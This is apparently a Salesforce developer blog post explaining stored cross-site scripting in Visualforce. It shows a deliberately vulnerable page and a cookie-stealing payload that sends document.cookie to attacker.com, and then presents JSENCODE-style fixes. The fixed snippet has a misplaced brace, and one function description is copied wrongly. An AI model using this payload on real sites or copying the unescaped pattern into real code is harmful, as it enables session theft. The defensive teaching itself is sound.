Continuing to my previous post , this time I would to share the knowledge on Stored XSS part.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.

In other words :
“Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.”

Let’s have an example:
<apex:page>

<script>
function crossXSS()
{
var xssExample = ‘{!Account.Name}’ ;
}
</script>
<apex:form>
<apex:commandLink value=”Click me” onClick=”crossXSS();” />
</apex:form>

</apex:page>

Now suppose
Account Name is :  testName’;1′;document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?’%2Bdocument.cookie;var%20foo=’;

So this account name will always be on the page in script block and whenever the commandLink will be clicked “crossXSS” will be called and will be in the following manner:
var xssExample = ‘testName’;1′;document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?’%2Bdocument.cookie;var%20foo=’;

So again you can see here all the cookies will be sent to the attackers.com site.

What I suggested in previous blog , repeating all those things again :).

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = ‘{!JSENCODE(Account.Name})’ ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.

Add to Del.cio.us RSS Feed Add to Technorati Favorites Stumble It! Digg It!
    BuziTweet


CRM News Feed

CRM News FeedSalesforce DevelopmentContinuing to my previous post , this time I would to share the knowledge on Stored XSS part.So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.In other...CRM consulting and technology for Ireland and Europe, in the Public and private sector